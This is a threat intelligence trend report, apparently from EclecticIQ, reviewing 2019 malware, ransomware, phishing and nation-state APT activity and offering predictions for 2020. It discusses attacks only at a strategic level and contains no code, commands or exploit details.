2019 Threat Intelligence Trends and 2020 Predictions

Key Findings between 2018 and 2019

• Malware-as-a-Service is greatly expanding
• Threat actor infrastructure is increasingly being coopted by other operators
• Malware popularity was similar between 2018 and 2019.

Key Predictions for 2020

• Threat actor infrastructure will consolidate and make fingerprinting more difficult.
• Android will be the most victimized mobile OS 
• Phishing will continue to deliver the greatest volume of attacks
• CVEs will increase in volume and popular CVEs will lead to more devastating attacks
• Climate change policy will be the primary driver for further Hactivist activity.

Analysis of Last Year's Predictions for 2019 

• Significant increase of using open and publicly available tools as malware platforms for operations

Analysts observe a marked increase of Malware-as-a-Service (MaaS) attacks over 2019. MaaS commoditizes many pieces of malware into ‘tools’ that are licensed out for criminal activities within information networks.

There are two main drivers for expanding malware markets. First, malware development is fundamentally changing. Malware has been recorded developing at a rapid pace year-over-year, as measured by unique samples. Information Technology is passing a point where malware is no longer a scarce resource. Evidence of this is indicated by the marginal increase in new malware detections from 2018-2019. There are enough well-developed variants in circulation that a market of buyers and sellers is starting to emerge. MaaS employs different TTPs (Tactics, Techniques, and Procedures) than custom malware; Maas typically has heavy reuse of attack patterns. MaaS activity is further promoted in tandem with changes to Dark Web marketplaces that connect buyers and sellers to larger audiences (see report above). Increased malware circulation drives an increase in attack volume.

Second, threat actors are increasingly and deliberately sharing infrastructure. Historically, threats and attacks were tailored to the specific systems or networks that they were attempting to access. This allowed analysts to identify unique attack patterns and command-and-control infrastructures (C2). Attribution was not as difficult. Throughout 2019, as an offshoot of growing MaaS operations, threat actors are sharing entire command and C2. This trend makes final attribution more difficult.

MaaS samples are tailored in ways that make them highly modular and adaptable to different attacks. Part of the modular systems necessarily includes a robust C2 module. C2 networks increasingly leverage encryption and layers of obfuscation. 

On a higher level, analysts observe more cooperation between well-organized cybercriminal gangs. Different groups partner to increase the effectiveness of attacks.
 

• Increased political instability will lead to more nation-state attacks

There has been an increase in political instability across the globe over 2019. There has also been an increase in reporting of APT activity. The EclecticIQ Threat Intelligence Platform shows an increase of 425 additional APT reports in 2019 compared to 2018. However, there is not a clear causal relationship between these two observations as attribution is becoming more obscured. The success of past attacks and the spreading or sharing of attack infrastructure is likely supporting additional nation-state sponsored attacks. This is evident in Southeast-Asia (SEA) where analysts observe Vietnam-based groups greatly expanding State-backed operations in the region. The most active group was APT32. 

There is evidence from 2019 that points to multiple nation-states taking interest in the Indonesian general election of 2019. China, continuing its Belt and Road initiative partnership with other nations, has launched a steady stream of espionage activities to give it a competitive advantage in negotiations.

Increased attacks are also evident in the Middle East region. Threat Intelligence analysts observe more activity that is very likely being stimulated by continued political struggle consolidating around Iran. Threat intelligence information sharing is enabling better detection and describing of advanced attacks that fall under the umbrella of State-sponsored attacks. This may provide a simple explanation of why more reporting is observed. Analysts also noted that dwell time is decreasing for attacks.

• Attribution will add less value from a threat intelligence perspective

A trend that EclecticIQ threat intelligence highlighted in 2019 included the blurring of attack infrastructure across the internet. This observation is represented by TTP sharing, discussed above. When threat actors use TTPs associated with other groups, it makes attribution less valuable because threat actors increasingly operate in similar ways with similar objectives. In addition to this observed trend, analysts also note that State-linked security companies are developing malware and selling it to governments. This is considered a special case of MaaS. Example organizations that develop highly advanced malware include, Intrusion Set: NSO Group operating out of Israel, and the Zerodium Group, known to release 0-days to governments (CVE-2018-16983). This type of malware allows for deeper penetration of special networks, such as the SS7 mobile network, that would otherwise be more difficult to access without specialized tools.

Activity Observed in 2019

• APT and State-Linked Activities

EclecticIQ Analysts predicted further APT activity consolidated in the Middle East - mainly Iran. In Southeast Asia the focus centered on Vietnam, China, and North Korea. 2019 reporting of APT operations has been most heavily covering activities in the Middle East, Southeast Asia, and Russia. The uptick in middle east APT operations has been especially prevalent in 2019 with reporting of Iran-linked APT activity. Analysts expect to see heightened activity following the geopolitical rise in tensions in the Middle East; in this case, as Western countries confront Iran.

Analysts have seen multiple aggressive campaigns operated by groups with links to Russia this year. There was a lengthy report covering The Dukes, Russian APT group(s), that shows Russia is still aggressively operating throughout the globe after the 2016 US Election interference. The “FinSpy” APT has also exhibited steady operations against global financial targets in 2019. Threat Actor TA2101 was active globally with advanced phishing operations. EclecticIQ analysts note that this focus may be the result of western bias within threat intelligence.

• Malware and Attack Patterns (TTPs) in Review

Malware trends in 2019 are similar to those observed in the 2018 Trend Report. Bots, banking malware, and Remote Access Trojans (RATs) took the top spots in 2019. Current vendor reporting supports this evidence (Cisco , Proofpoint).

Botnets are driven and supported in their main capabilities by robust C2 infrastructure. Increasingly, botnet C2 communications employ encryption, and have encoded algorithms that generate new C2 addresses dynamically Botnets open an organization to a variety of further risks.

Banking malware is a prominently featured MaaS on many Dark Web marketplaces. This type of malware has seen significant developments increasing the scope of applications which can be targeted, and malware ability to retrieve login-overlay web templates from managed central repositories. These templates are very realistic and effective. In 2019 some of the most advanced banking malware originated inside and spread out from Brazil. Analysts do not see a marked increase in 2FA interception capabilities, but the threat persists.

RATs are becoming highly specialized, more modular, and stealthier during installation. Specifically, some RAT families are evolving into specialized loaders, which initiate a further, final payload over multiple stages. Custom RATs are still featured as main payloads for more advanced campaigns. The attack patterns used to stage the malware typically involve Living-off-the-Land TTPs, which make the operations harder to detect, once they initially slip through perimeter defense. A large part of this development can be attributed to threat actors sharing infrastructure, which is speeding-up malware development.

Ransomware is evolving rapidly as Big Game Hunting (BGH) ransoms are paid. Ransomware threat actor groups have been increasingly targeting organizations higher in software supply chains (MSPs, CDNs). TTPs used with ransomware have distinctly shifted to BGH attacks and attacks on health and education institutions. A major update to ransomware in 2019, highlighted by the Malware Maze family, uses TTPs whereby threat actors first exfiltrate all the information before performing encryption. The attackers release the company information publicly if the ransom is not paid.

Mobile malware is currently a standard toolset for many APT intrusion sets. A good example of this is the WhatsApp 0-day from 2019. The increased drive in mobile malware follows our growing reliability on mobile devices. Reporting indicates there is now widespread penetration of cellular networks and mobile protocols, including targeted SIM card exploitation. This type of mobile spyware is in operation by unknown threat actors and was able to extensively penetrate the SS7 network to target specific individuals. It is highly suspected that this technology remains in the hands of State governments and has not yet spread widely.

• Financial Crimes Exploit Systems Higher in Supply Chains

In 2019, intrusion sets that target traditional electronic currency (credit cards) like Magecart targeted supply chains at a greater pace to include exploitation of CDNs and managed SaaS payment platforms.

Cryptocurrency attacks, while still targeting individuals, show a trend of targeted attacks on entire exchanges or trading platforms. Analysts observe ransomware currently offsetting cryptojacking attacks. This is expected to continue unless there is another spike in cryptocurrency valuation.

Ransomware popularly targets MSPs to spread infection. Analysts also observed advanced campaigns, like ShadowHammer, use supply chain compromise as a cornerstone of their attack pattern with very effective results.

Phishing continues to be a low-barrier attack vector and the most popular delivery vector by volume. Phishing TTPs continue to get better at penetrating human and machine defenses despite security advancements. One important development analysts have observed in 2019 is the ability of malware modules to intercept real email content and further weaponize it in additional attacks (Emotet malware). 

BEC compromise was also notable in 2019. Active groups include: Silent Starling, London Blue, Silver Terrier. BEC TTPs use social engineering over multi-staged attacks to make their operations particularly effective. BEC TTPs in 2019 have been successful enough to draw attention from the FBI and BBB.

2020 Predictions

• APT and State-linked operations will continue to follow geopolitical conflicts
• Infrastructure will further consolidate and will be further coopted by threat actors, including APT groups
• Major criminal networks will develop stronger inter-networks with others to support operations. One effect this will have is to further blur the lines between State-linked APT and traditional criminal operations
• Malware variants are evolving to coordinate together. Different malware components will increasingly borrow and share interchangeable modules like plugins or apps involving multiple developers and code overlaps.
• Analysts expect to see mobile malware attack volumes increase again through 2020. Android OS will continue to be attacked in high volume due to its popularity, not only on mobile devices, but increasingly installed on IoT devices, such as public display boards. 
• Ransomware payments will increase in smaller, less capable industries and organizations. As BGH TTPs are exacerbated, threat actors will likely turn to smaller organizations using the same TTPs.
• Cryptocurrency attacks are expected to remain popular and steady, pending any significant crypto-valuation fluctuations. New major players entering cryptocurrency (Facebook Libra) are expected to increase attack volume. 
• APT style attack patterns are expected to become more widespread as MaaS and infrastructure sharing grow and introduce further threat-actor participants.
• Phishing attacks will become much more automated and low-touch for threat actors, while also maintaining high-efficacy. Ransomware will continue offsetting cryptojacking attacks unless there is a spike in cryptocurrency valuation.
• The disclosure of CVE's will continue to steadily rise
• High levels of threat intelligence reporting will force high-profile APT groups to change TTPs in favor of completely custom operations as a way to avoid detection and attribution

Read the full report including the 2020 Threat Intelligence-based Security Recommendations here